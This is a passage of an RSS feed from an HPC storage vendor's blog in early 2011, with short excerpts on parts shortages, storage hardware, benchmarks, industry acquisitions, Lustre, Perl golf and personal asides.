    
    <item>
      <title>Parts shortages</title>
      <link>https://blog.scalability.org/2011/03/parts-shortages/</link>
      <pubDate>Thu, 24 Mar 2011 01:17:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/parts-shortages/</guid>
      <description>We&amp;rsquo;ve noticed this over the past week. Have a number of new orders, and suddenly, memory is hard to find. And prices have jumped dramatically. From /.
We do just-in-time builds, we tend to keep inventory down. Global supply and demand folks, the economy is operating as it should. When you have shortages, pricing rises through channel to market. There is little we can do about this. We have some memory supply (the parts giving us issues now), and CPUs aren&amp;rsquo;t a problem.</description>
    </item>
    
    <item>
      <title>OT: Darned caffeine containment leak ...</title>
      <link>https://blog.scalability.org/2011/03/ot-darned-caffeine-containment-leak/</link>
      <pubDate>Wed, 23 Mar 2011 20:05:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/ot-darned-caffeine-containment-leak/</guid>
      <description>on my desk. Quick thinking Doug managed to help me avoid a tragedy of epic proportions (completely covering my desk with coffee) by application of the caffeine leak containment device (e.g. towel). No pictures of this tragedy, and it was unrelated to any earthquakes. It was related to the klutz whose left hand was near the coffee and moved it like this &amp;hellip; DO&amp;rsquo;H!</description>
    </item>
    
    <item>
      <title>What should 432TB of storage cost?</title>
      <link>https://blog.scalability.org/2011/03/what-should-432tb-of-storage-cost/</link>
      <pubDate>Fri, 18 Mar 2011 20:19:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/what-should-432tb-of-storage-cost/</guid>
      <description>This is close to 1/2 PB. Assume you are building a very fast storage unit and backup system. What should this cost? Yeah, we can argue about cost per GB/s and cost per IOP/s. Assume 3GB/s, and 10k IOPs. Assume the unit is 144TB raw (108TB usable) primary fast storage, and 288TB raw (216TB usable) storage. There is a poll for this post, but you have to click the title to be able to participate.</description>
    </item>
    
    <item>
      <title>Day job PR on a new accelerated cluster at Stanford</title>
      <link>https://blog.scalability.org/2011/03/day-job-pr-on-a-new-accelerated-cluster-at-stanford/</link>
      <pubDate>Wed, 16 Mar 2011 16:02:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/day-job-pr-on-a-new-accelerated-cluster-at-stanford/</guid>
      <description>See InsideHPC for the scoop. PRWeb stuff here. Will have it up on our site soon. This uses the XCT chassis, which lets us use C20x0 Fermi, as well as other PCIe cards (can you say Virident Flash? ) The system will be using Bright Computing&amp;rsquo;s excellent Cluster Management tool. We will take pictures/movies during assembly and installation. Should be fun! About 15TF, 100x Fermi units, 96TB storage. Excellent design overall (pats himself on the back), and a major win for our partner JRTI and us, validating our strategic partnership.</description>
    </item>
    
    <item>
      <title>Not good</title>
      <link>https://blog.scalability.org/2011/03/not-good/</link>
      <pubDate>Sat, 12 Mar 2011 22:21:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/not-good/</guid>
      <description>The earthquake, tsunami and its after effects are terrible enough. Our thoughts are with the people of Japan (we have quite a few readers there). The US Red Cross has setup to take donations for relief work there if you are inclined to go that route. If you are in Japan, and have alternative suggestions as to how we all can help, please do post them. One of the after effects of this event was a destabilization of a boiling water reactor.</description>
    </item>
    
    <item>
      <title>Deskside box with lotsa GPUs</title>
      <link>https://blog.scalability.org/2011/03/deskside-box-with-lotsa-gpus/</link>
      <pubDate>Fri, 11 Mar 2011 20:28:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/deskside-box-with-lotsa-gpus/</guid>
      <description>Testing this for a partner. A Pegasus deskside supercomputer with 12x X5690 CPU cores, 48 GB RAM, 500 MB/s IO channel (soon to 1 GB/s), and a GTX 260 graphics card. Connected to an XCT a-Brix 2U unit with 4x NVidia Fermi C2050&amp;rsquo;s (normally we&amp;rsquo;d use a JackRabbit unit, but they are all busy with customer projects right now). First, lets see whats there:
[root@pegasus C]# lspci | grep nVidia | grep VGA 06:00.</description>
    </item>
    
    <item>
      <title>... and NetApp buys Engenio ...</title>
      <link>https://blog.scalability.org/2011/03/and-netapp-buys-engenio/</link>
      <pubDate>Thu, 10 Mar 2011 21:36:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/and-netapp-buys-engenio/</guid>
      <description>[updated] Ok, this one is huge. Many of the higher end storage folks in the HPC world use this hardware. Which NetApp will now own. NetApp is not an HPC storage vendor, and I don&amp;rsquo;t think they have designs to be one [update] yes they do! But this goes to Cray, SGI, Oracle, Dell, IBM, HP, and many others (DDN, Bluearc, Terascala, etc.) who do use Engenio. We don&amp;rsquo;t use it, so its really not an issue to us.</description>
    </item>
    
    <item>
      <title>when failures stick out like a statistical sore thumb</title>
      <link>https://blog.scalability.org/2011/03/when-failures-stick-out-like-a-statistical-sore-thumb/</link>
      <pubDate>Thu, 10 Mar 2011 16:43:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/when-failures-stick-out-like-a-statistical-sore-thumb/</guid>
      <description>Parts fail. Components fail. You have to operate assuming they will fail. A warranty is fundamentally a bet that parts will fail, and a willingness to place money (the price of the warranty) on that bet. Over time, with enough components, you get a feel for how often parts fail. You get historical data. When one subset of components have a high failure rate (e.g. Corsair SSD disks), you know you can isolate the problem.</description>
    </item>
    
    <item>
      <title>Single vs Multi-stream on JackRabbit JR5</title>
      <link>https://blog.scalability.org/2011/03/single-vs-multi-stream-on-jackrabbit-jr5/</link>
      <pubDate>Wed, 09 Mar 2011 21:53:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/single-vs-multi-stream-on-jackrabbit-jr5/</guid>
      <description>A customer was playing with one of our lab machines (a JackRabbit JR5), and asked us if we could improve the multithread streaming performance. The way we had it set up (for internal testing) was non-optimal for their use case. So we went back and did some simple tweaks. Somewhat better optimized for their use case. Remember, this is our previous generation unit. Next gen is &amp;hellip; a little faster :)</description>
    </item>
    
    <item>
      <title>... and Hitachi GST is eaten by ... WD ...</title>
      <link>https://blog.scalability.org/2011/03/and-hitachi-gst-is-eaten-by-wd/</link>
      <pubDate>Mon, 07 Mar 2011 22:59:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/and-hitachi-gst-is-eaten-by-wd/</guid>
      <description>Hitachi, whose drives we do like, was just eaten by WD, whose drives we run away from. Story here. As long as the product lines that get ditched are the WD&amp;rsquo;s in favor of the Hitachi&amp;rsquo;s, I am ok with this. 2TB drives that decide to randomly power down in a RAID, without informing anyone? And a company that seems to want us all to believe that there are no firmware updates?</description>
    </item>
    
    <item>
      <title>BTW:  had an iPhone-ish meltdown</title>
      <link>https://blog.scalability.org/2011/03/btw-had-an-iphone-ish-meltdown/</link>
      <pubDate>Fri, 04 Mar 2011 22:04:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/btw-had-an-iphone-ish-meltdown/</guid>
      <description>took all my contact data with it &amp;hellip; so &amp;hellip; if you happen to want me to contact you, gotta give me some numbers to reach you at. Private email me at joe@scalability.org and I&amp;rsquo;ll re-enter it (and store it somewhere else). Yeah, mobile device backup? Pretty darned important? Me? A fool for not doing this regularly.</description>
    </item>
    
    <item>
      <title>I can&#39;t believe I forgot to update this</title>
      <link>https://blog.scalability.org/2011/03/i-cant-believe-i-forgot-to-update-this/</link>
      <pubDate>Fri, 04 Mar 2011 21:35:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/i-cant-believe-i-forgot-to-update-this/</guid>
      <description>Day job storage unit has increased density. JackRabbit JR2 tops out at 36TB now, JackRabbit JR3 tops out at 48TB, JackRabbit JR4 tops out at 72TB, and JackRabbit JR4 tops out at 144TB. 8 of the latter can go into a 42U rack, and get you 1.1PB of insanely fast storage. Our measured bandwidths are also quite good. JR4&amp;rsquo;s are demonstrating sustained 2+GB/s. JR5&amp;rsquo;s &amp;hellip; well :) DeltaV units of similar size specs.</description>
    </item>
    
    <item>
      <title>Quick accounting tool for Torque</title>
      <link>https://blog.scalability.org/2011/03/quick-accounting-tool-for-torque/</link>
      <pubDate>Thu, 03 Mar 2011 05:30:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/quick-accounting-tool-for-torque/</guid>
      <description>A long while ago, I had developed a usage summary tool for gridengine. For our small internal cluster, we are using Torque (we set it up just as thedejecta was hitting the high rotational rate elements w.r.t. gridengine at Oracle, link URL may not be safe for work, and you might be offended by it &amp;hellip; if so, I apologize.). This summary tool was a quick way to parse the accounting records.</description>
    </item>
    
    <item>
      <title>Members of Rocks core team moving to Rocks startup</title>
      <link>https://blog.scalability.org/2011/02/members-of-rocks-core-team-moving-to-rocks-startup/</link>
      <pubDate>Mon, 28 Feb 2011 19:43:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/members-of-rocks-core-team-moving-to-rocks-startup/</guid>
      <description>Rocks, as folks might know is a cluster distribution based upon Redhat/Centos. This brings in all sort of issues on its own, but Rocks attempts to work around this and knead the distribution and associated tools into a cogent form, for simple cluster setup. The core team consisted of the project lead, several developers and a number of others directly or loosely affiliated with the group. Two members, Dr. Greg Bruno, and Mason Katz, just left to join Clustercorp, who make the commercial version, Rocks+.</description>
    </item>
    
    <item>
      <title>Plus ca change, plus c&#39;est la meme chose</title>
      <link>https://blog.scalability.org/2011/02/plus-a-change-plus-a-la-mentia/</link>
      <pubDate>Fri, 25 Feb 2011 06:11:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/plus-a-change-plus-a-la-mentia/</guid>
      <description>The more things change, the more they stay the same. My former employer (left on good terms, between layoffs a decade ago next month) SGI has layoffs coming. This is a tough environment folks, a very tough environment. We pulled out a nearly 12% revenue growth in it. SGI posted a profit, but if you click through to the underlying article (hit InsideHPC first though), you see some interesting analysis. First on the size of the layoff.</description>
    </item>
    
    <item>
      <title>The spork gains support</title>
      <link>https://blog.scalability.org/2011/02/the-spork-gains-support/</link>
      <pubDate>Thu, 24 Feb 2011 22:33:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/the-spork-gains-support/</guid>
      <description>This is goodness. Really. Peter Jones just sent out an email to the Lustre Discuss list, and it covers much of what i was hoping to see. Process ownership, agreement around the release for 2.1, central tracker, and build info. Yeah, its probably not the optimal outcome, but its a better place than we were a week or more ago. And that was still better than a month or two ago.</description>
    </item>
    
    <item>
      <title>Interesting FUD floating about</title>
      <link>https://blog.scalability.org/2011/02/interesting-fud-floating-about/</link>
      <pubDate>Wed, 23 Feb 2011 23:29:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/interesting-fud-floating-about/</guid>
      <description>One of our competitors, having been recently purchased by a very large storage company, seems to be telling some customers that they replaced an infrastructure that we sold to to a large supercomputer center in the northern midwest. Curious, I hadn&amp;rsquo;t heard of this. Last I checked (a few minutes ago), the infrastructure was still in use. Moreover, they said &amp;ldquo;they&amp;rdquo; replaced GlusterFS on the system. Again &amp;hellip; curious, as I don&amp;rsquo;t quite remember them on the con-calls.</description>
    </item>
    
    <item>
      <title>Cloudy expectations for HPC</title>
      <link>https://blog.scalability.org/2011/02/cloudy-expectations-for-hpc/</link>
      <pubDate>Tue, 22 Feb 2011 15:15:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/cloudy-expectations-for-hpc/</guid>
      <description>I&amp;rsquo;ve mentioned in the past, where users expectations deviated, often wildly, from the reality of a system. The reason for these deviations of expectations could be internal (convincing yourself that &amp;ldquo;instant&amp;rdquo; means, literally, &amp;ldquo;instant&amp;rdquo;), external (believing marketing blurbs), or some factor between the two. At HPCinthecloud, an article on a user running head first into the reality of cloud computing, and avoiding the hype. Ok, a number of critical take-aways. One is that end user expectations can be wildly &amp;hellip; badly &amp;hellip; out of sync with reality.</description>
    </item>
    
    <item>
      <title>We need to get better at weather forecasting</title>
      <link>https://blog.scalability.org/2011/02/we-need-to-get-better-at-weather-forecasting/</link>
      <pubDate>Mon, 21 Feb 2011 19:01:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/we-need-to-get-better-at-weather-forecasting/</guid>
      <description>Big HPC area. Yesterday, all the forecast models had us getting ~1.5 inches (about 4cm) of snow with rain/ice afterwords. We got (locally by me) 12+ inches (30+cm). Ok. I don&amp;rsquo;t mind if there are large error bars. Really I don&amp;rsquo;t. But this ? I don&amp;rsquo;t know enough about the models to be able to say anything terribly intelligent about their intrinsic accuracy, or if the omit anything, under/over predict anything &amp;hellip; I do know enough to say that they weren&amp;rsquo;t in the same ballpark as what we got.</description>
    </item>
    
    <item>
      <title>Need to look at MooseFS</title>
      <link>https://blog.scalability.org/2011/02/need-to-look-at-moosefs/</link>
      <pubDate>Mon, 21 Feb 2011 17:20:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/need-to-look-at-moosefs/</guid>
      <description>Looks similar to a number of others, but whats interesting is that it keeps its metadata in RAM. How much of an impact that provides for updates depends upon the efficiency of the network stack, and how much security it provides depends upon its ability to recover from unplanned outages &amp;hellip; that is, it can&amp;rsquo;t just run in ram an occasionally update something on disk. Gotta look at this more though, as it could be interesting as a front end FS to something else on the backend.</description>
    </item>
    
    <item>
      <title>Old model JackRabbit 5U bonnie&#43;&#43;</title>
      <link>https://blog.scalability.org/2011/02/old-model-jackrabbit-5u-bonnie/</link>
      <pubDate>Sat, 19 Feb 2011 18:24:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/old-model-jackrabbit-5u-bonnie/</guid>
      <description>Previous version of our JR5 unit, in the lab as a test bed for customers. Testing firmware and driver updates, among other things. Simple bonnie++ 1.96 run. You know I am not a huge fan of this as a load generator, or as a benchmark. Regardless, here is the output:
[root@jr5-lab ~]# bonnie++ -u root -d /data -s 144g:1024k -f Using uid:0, gid:0. Writing intelligently...done Rewriting... done Reading intelligently...done start &#39;em.</description>
    </item>
    
    <item>
      <title>RFPs that request a pony</title>
      <link>https://blog.scalability.org/2011/02/rfps-that-request-a-pony/</link>
      <pubDate>Thu, 17 Feb 2011 17:45:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/rfps-that-request-a-pony/</guid>
      <description>Yeah, I have one of those in front of me now. The requirements are for all intents and purposes, impossible to simultaneously satisfy. Q&amp;amp;A; response from customer suggests that they may be willing to compromise some aspects, but not enough to actually satisfy their request. Sort of like &amp;ldquo;I want 1 PB &amp;hellip; for free, with free lifetime 24x7 support, &amp;hellip; , infinite bandwidth, infinite snapshots, infinite IOPs. And I want a pony.</description>
    </item>
    
    <item>
      <title>Pushing atoms versus pushing bits</title>
      <link>https://blog.scalability.org/2011/02/pushing-atoms-versus-pushing-bits/</link>
      <pubDate>Thu, 17 Feb 2011 06:48:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/pushing-atoms-versus-pushing-bits/</guid>
      <description>Cloud computing is driving a disruptive change through a number of market places. It started long before virtualization, but virtualization really enabled much of what we have now. Remember, at the end of the day, the entire process is economic in nature. Cost per cycle does matter. When a vendor sells hardware, they are selling all the cycles of that hardware over the usable lifetime of the hardware. They push the atoms at the customer, and let the customer manage the economics of utilization.</description>
    </item>
    
    <item>
      <title>Storage bandwidth wall writ large</title>
      <link>https://blog.scalability.org/2011/02/storage-bandwidth-wall-writ-large/</link>
      <pubDate>Tue, 15 Feb 2011 21:23:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/storage-bandwidth-wall-writ-large/</guid>
      <description>Henry Newman, CEO/CTO of Instrumental, has a great article on Enterprise Storage Forum. Remember, what we call the storage bandwidth wall, e.g. the time in seconds to read/write your disk, is your capacity divided by your bandwidth to read/write that capacity. Its a height, measured in seconds, to take one pass through your data. If you can read/write at 1GB/s and have 1TB of data, your wall height is 1000GB/(1 GB/s) = 1000s.</description>
    </item>
    
    <item>
      <title>More code golf:  &#34;grid&#34; computing</title>
      <link>https://blog.scalability.org/2011/02/more-code-golf-grid-computing/</link>
      <pubDate>Mon, 14 Feb 2011 20:05:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/more-code-golf-grid-computing/</guid>
      <description>I told you I was an addict. Problem statement is here.
And you want to do it in the minimum number of characters (e.g. golf strokes) in your programming language. They give an example matrix, and their result (which is correct). So &amp;hellip; what can you do for this? I used two languages: Octave/Matlab and Perl. The former is more of a &amp;lsquo;modeling&amp;rsquo; language with formal programming bits atop it, and the latter is a classical programming language, quite notorious for its ability to be terse.</description>
    </item>
    
    <item>
      <title>JackRabbit updates for greater density</title>
      <link>https://blog.scalability.org/2011/02/jackrabbit-updates-for-greater-density/</link>
      <pubDate>Mon, 14 Feb 2011 16:23:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/jackrabbit-updates-for-greater-density/</guid>
      <description>JR4 units with up to 72 TB per 4U, at our nice sustained 2+ GB/s data rates. JR5 units with up to 144 TB per 5U at 2.5+ GB/s data rates. You can order our systems with these units. Thats 720TB/rack of JR4&amp;rsquo;s with 20+ GB/s sustained, or 1152TB per rack of JR5&amp;rsquo;s with 20 GB/s sustained. Built into our siCluster units, they represent some of the fastest and most cost effective hardware to build storage, storage clusters, storage clouds, and so on.</description>
    </item>
    
    <item>
      <title>Sometimes you get the bear ... other times, the bear gets you</title>
      <link>https://blog.scalability.org/2011/02/sometimes-you-get-the-bear-other-times-the-bear-gets-you/</link>
      <pubDate>Sat, 12 Feb 2011 16:28:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/sometimes-you-get-the-bear-other-times-the-bear-gets-you/</guid>
      <description>This took guts. The (new) CEO of Nokia noting that there are issues going forward. Nokia has had great handsets. I still recall with great fondness, the E61 that I left in a taxi somewhere in London after visiting a customer &amp;hellip; But Nokia hasn&amp;rsquo;t innovated in a meaningful way, hasn&amp;rsquo;t adapted well to the rapid change in market conditions. Like RIM, their phones are competent, excellent phones. Unlike Apple and Google/Android, their phones don&amp;rsquo;t have a great user experience.</description>
    </item>
    
    <item>
      <title>Physics humor for a Friday morning ...</title>
      <link>https://blog.scalability.org/2011/02/physics-humor-for-a-friday-morning/</link>
      <pubDate>Fri, 11 Feb 2011 15:37:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/physics-humor-for-a-friday-morning/</guid>
      <description>From xkcd Heh &amp;hellip; If you don&amp;rsquo;t know what a complex conjugate is, read this. Basically, if I have a function Ψ(x) which has a &amp;ldquo;real&amp;rdquo; part ψr(x) and an imaginary part ψi(x), with the ψ&amp;rsquo;s being real valued functions, so Ψ(x) = ψr(x) +iψi(x)), then multiplying Ψ(x) by its complex conjugate (Ψ(x) = ψr(x) - i*ψi(x) , where i =√(-1) ) yields:
(ψr(x) + i*ψi(x)) * (ψr(x) - i*ψi(x))</description>
    </item>
    
    <item>
      <title>I know I shouldn&#39;t be ... but I am ...</title>
      <link>https://blog.scalability.org/2011/02/i-know-i-shouldnt-be-but-i-am/</link>
      <pubDate>Thu, 10 Feb 2011 03:26:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/i-know-i-shouldnt-be-but-i-am/</guid>
      <description>[update] a bug in my reasoning (thanks Peter!) a Perl Golf addict. Not a recovering addict, but one that is active. What is Perl Golf? Well, as in real golf, you try to provide the minimal number of steps to a solution. In this case, you are to solve the specific puzzle. Detractors of Perl often make snarky comments about Perl&amp;rsquo;s equivalency to random line noise and other such nonesense. Sure &amp;hellip; if it makes you feel good to say that &amp;hellip; I am a fan of terse languages, I wrote programs (if you could call them that) in APL &amp;hellip; a while ago.</description>
    </item>
    
    <item>
      <title>fun with SCSI targets</title>
      <link>https://blog.scalability.org/2011/02/fun-with-a-scsi-target/</link>
      <pubDate>Wed, 09 Feb 2011 06:48:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/fun-with-a-scsi-target/</guid>
      <description>Had some fun today with our SCSI target. Its a very nice system, very powerful. Not terribly easy to use. But it works well. We have tools we developed around it to make it easy to use. Creating iSCSI targets works nicely with our target code. It builds the target, sets up the infrastructure. Done with thin provisioning, its pretty fast and mostly painless. Well, it was until we discovered that the stack, while including /etc/initiators.</description>
    </item>
    
    <item>
      <title>... and Lustre sporks ...</title>
      <link>https://blog.scalability.org/2011/02/and-lustre-sporks/</link>
      <pubDate>Wed, 09 Feb 2011 06:25:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/and-lustre-sporks/</guid>
      <description>A spork is a cross between a spoon and a fork. Of course there is a double entendre buried in their, as spoon (or spooning) implies a close relationship, and a fork (or forking) implies a split from an original. I think Lustre is sporking. Seriously. And this is a good thing for Lustre (as the major forces behind it are aligning, and still bending over backwords to avoid using the dreaded &amp;ldquo;f&amp;rdquo;-word).</description>
    </item>
    
    <item>
      <title>Semi-OT:  No ...  really ... no ...</title>
      <link>https://blog.scalability.org/2011/02/semi-ot-no-really-no/</link>
      <pubDate>Mon, 07 Feb 2011 20:07:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/semi-ot-no-really-no/</guid>
      <description>This is an economic thing. If I sell my house, in my suburban neighborhood, and I make a profit from that activity, should I be required to share my profit with my neighbors, who don&amp;rsquo;t own my house? The answer to this is, obviously not. If my business makes money, and makes a profit, should I be required to share my profit with others, who don&amp;rsquo;t own a portion of my business?</description>
    </item>
    
    <item>
      <title>And yet again ...</title>
      <link>https://blog.scalability.org/2011/02/and-yet-again/</link>
      <pubDate>Thu, 03 Feb 2011 21:52:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/and-yet-again/</guid>
      <description>Me: (presents A) &amp;ldquo;So what do you think?&amp;rdquo; Them: &amp;ldquo;Hmmm &amp;hellip; nice but what comes after A?&amp;rdquo; Me: &amp;ldquo;Lets get another time slot and I&amp;rsquo;ll go over that&amp;rdquo; (time passes &amp;hellip; order of weeks) Me: (presents post-A) &amp;ldquo;So what do you think&amp;rdquo; Them: &amp;ldquo;Hmmm &amp;hellip; nice but what comes after post-A?&amp;rdquo; Me: &amp;ldquo;Lets get another time slot and I&amp;rsquo;ll go over that&amp;rdquo; (time passes &amp;hellip; order of several months, lets call B as post post-A, and we hit important business milestones) Me: (presents B) &amp;ldquo;So what do you think&amp;rdquo; Them: &amp;ldquo;Hmmm &amp;hellip; nice but what about A?</description>
    </item>
    
    <item>
      <title>OT: First good legislation of the year;  Get rid of the onerous 1099 stuff from Obamacare</title>
      <link>https://blog.scalability.org/2011/02/ot-first-good-legislation-of-the-year-get-rid-of-the-onerous-1099-stuff-from-obamacare/</link>
      <pubDate>Wed, 02 Feb 2011 23:27:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/ot-first-good-legislation-of-the-year-get-rid-of-the-onerous-1099-stuff-from-obamacare/</guid>
      <description>Looks like the amendment passed. This provision would have required that we keep records of every transaction above $600 in terms of 1099 forms. So if I go buy tickets for a business trip on LinkedIn, I have to fill out some 1099 bits (and so do they). If someone buys more than $600 of stuff from us, an exchange of 1099 info. Yeah. It was really dumb, and it shouldn&amp;rsquo;t have been in Obamacare.</description>
    </item>
    
    <item>
      <title>If you can&#39;t beat em, copy em ...</title>
      <link>https://blog.scalability.org/2011/02/if-you-cant-beat-em-copy-em/</link>
      <pubDate>Wed, 02 Feb 2011 16:46:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/02/if-you-cant-beat-em-copy-em/</guid>
      <description>Google catches  Microsoft with its proverbial hand in the (search) cookie jar &amp;hellip; Microsoft&amp;rsquo;s non-denial denial reads not unlike a Monty Python skit I am fond of. Search for &amp;ldquo;bat&amp;rdquo;. &amp;ldquo;No we didn&amp;rsquo;t!!!&amp;rdquo; then &amp;ldquo;Well, what we meant was &amp;hellip;.&amp;rdquo; heh! That takes cajones!</description>
    </item>
    
    <item>
      <title>2010:  Day job&#39;s best year on record, ever</title>
      <link>https://blog.scalability.org/2011/01/2010-day-jobs-best-year-on-record-ever/</link>
      <pubDate>Mon, 31 Jan 2011 16:57:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/2010-day-jobs-best-year-on-record-ever/</guid>
      <description>Just finished an analysis of last years results. We are a private company, so we don&amp;rsquo;t release financial info (apart from potential investors and those looking to take a stake in the company). We hit 11.7% growth in revenue for the year, and hit a company all time high revenue. This is despite a rather challenging economic environment (to say the least). Costs rose, some &amp;hellip; er &amp;hellip; astoundingly so. Looking to build on this, and accelerate forward.</description>
    </item>
    
    <item>
      <title>Are HPC cloud users expectations realistic?</title>
      <link>https://blog.scalability.org/2011/01/are-hpc-cloud-users-expectations-realistic/</link>
      <pubDate>Sun, 30 Jan 2011 06:15:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/are-hpc-cloud-users-expectations-realistic/</guid>
      <description>Several years ago, before clouds were all the rage, we were working with a large customer discussing an &amp;ldquo;on-demand&amp;rdquo; HPC computing service. This service predated Amazon&amp;rsquo;s setup, and was more in line with what Sabalcore, CRL and others are doing. I remember distinctly from my conversations with the customer that they had particular desires. Specifically, they wanted to run on always the latest/greatest/fastest possible hardware, and not pay any more for this.</description>
    </item>
    
    <item>
      <title>Throwing signs</title>
      <link>https://blog.scalability.org/2011/01/throwing-signs/</link>
      <pubDate>Fri, 28 Jan 2011 03:52:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/throwing-signs/</guid>
      <description>Too funny:
[ ](http://scalability.org/images/geekgangsignsmain11-450x311.jpg)
[had to update, as the folks putting the image up started blocking our link back to them &amp;hellip; I thought we did this correctly &amp;hellip; wasn&amp;rsquo;t trying to steal bandwidth]</description>
    </item>
    
    <item>
      <title>Oh what a day</title>
      <link>https://blog.scalability.org/2011/01/oh-what-a-day/</link>
      <pubDate>Thu, 27 Jan 2011 22:21:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/oh-what-a-day/</guid>
      <description>No details, but this is the sort of day I can do without in terms of excitement. Tonight is fight night in karate. Maybe I can suit up and hit with my good hand. Yeah, its been one of those days.</description>
    </item>
    
    <item>
      <title>As the high performance storage world evolves ...</title>
      <link>https://blog.scalability.org/2011/01/as-the-high-performance-storage-world-evolves/</link>
      <pubDate>Thu, 27 Jan 2011 05:30:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/as-the-high-performance-storage-world-evolves/</guid>
      <description>Last year, say July time frame, if you asked me to name the top high performance computing file systems, and prognosticate who the up and comers were &amp;hellip; well, you&amp;rsquo;d get lists much like I&amp;rsquo;ve said here in the past. Lustre was the &amp;ldquo;king&amp;rdquo; and undisputed leader. pNFS was (sorry Bruce and team) effectively perpetually in the future (yeah, sort of like Perl6 &amp;hellip; though we intend to play with both sometime soon &amp;hellip; I hope).</description>
    </item>
    
    <item>
      <title>My kingdom for good error messages ... or something like that</title>
      <link>https://blog.scalability.org/2011/01/my-kingdom-for-good-error-messages-or-something-like-that/</link>
      <pubDate>Tue, 25 Jan 2011 22:58:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/my-kingdom-for-good-error-messages-or-something-like-that/</guid>
      <description>I just spent too long tearing my (altogether far too few remaining) hair(s) out over a driver issue. Qlogic 7240 IB card. Decent DDR unit. Our 2.6.32.22 kernel. Very stable kernel. Rock solid under ridiculous load. OFED 1.5.2 with all the nice bug fixes etc. And inserting/removing qib would cause all manner of kernel hiccups. So much for stability. Well, that is, as long as the ib_ipath.ko, from the kernel RPM, was in there.</description>
    </item>
    
    <item>
      <title>There are times that this is amusing ... other times, not so much</title>
      <link>https://blog.scalability.org/2011/01/there-are-times-that-this-is-amusing-other-times-not-so-much/</link>
      <pubDate>Tue, 25 Jan 2011 18:01:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/there-are-times-that-this-is-amusing-other-times-not-so-much/</guid>
      <description>Customer: Must be something wrong with your gear, because we know what we are doing. Me: Er &amp;hellip; (noting that something that was working correctly before they touched it, is no longer working) &amp;hellip; ok &amp;hellip; so what changes have you made? Customer: Changes? We haven&amp;rsquo;t changed anything! Me: Er &amp;hellip; but it was working, then it stopped working. So what changed? Customer: We just altered the network Me: Ok, now we are onto something (and likely the reason why the &amp;ldquo;equipment is broken&amp;quot;) Customer: But we didn&amp;rsquo;t break it &amp;hellip; Me: Yes, I understand.</description>
    </item>
    
    <item>
      <title>Interesting observation with respect to the poll</title>
      <link>https://blog.scalability.org/2011/01/interesting-observation-with-respect-to-the-poll/</link>
      <pubDate>Fri, 21 Jan 2011 17:16:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/interesting-observation-with-respect-to-the-poll/</guid>
      <description>I&amp;rsquo;ve been monitoring the IP addresses and logs on the poll voting. You can vote for more than one item, select several, hit vote, and it generates a cookie so that you won&amp;rsquo;t be able to vote again. That is, unless you take the explicit step of clearing this cookie. And voting again. What this is telling me is that people feel a need not to simply report their (possibly multiple) preferences &amp;hellip; but instead to actively game an informal measurement system.</description>
    </item>
    
    <item>
      <title>Eric Schmidt out in April as CEO of google</title>
      <link>https://blog.scalability.org/2011/01/eric-schmidt-out-in-april-as-ceo-of-google/</link>
      <pubDate>Thu, 20 Jan 2011 21:55:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/eric-schmidt-out-in-april-as-ceo-of-google/</guid>
      <description>See here. Larry Page (U of Mich alum &amp;hellip; woot!*) More power to Larry (and all the other co-founders out there with vision and a desire to get the job done). Don&amp;rsquo;t forget to grow some data center bits here &amp;hellip; its really cold right now &amp;hellip; no need to spend on cooling for like 6 months out of the year! (not to mention, we have some nice servers we can customize for you!</description>
    </item>
    
    <item>
      <title>Day job: new website about to go up</title>
      <link>https://blog.scalability.org/2011/01/day-job-new-website-about-to-go-up/</link>
      <pubDate>Wed, 19 Jan 2011 21:10:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/01/day-job-new-website-about-to-go-up/</guid>
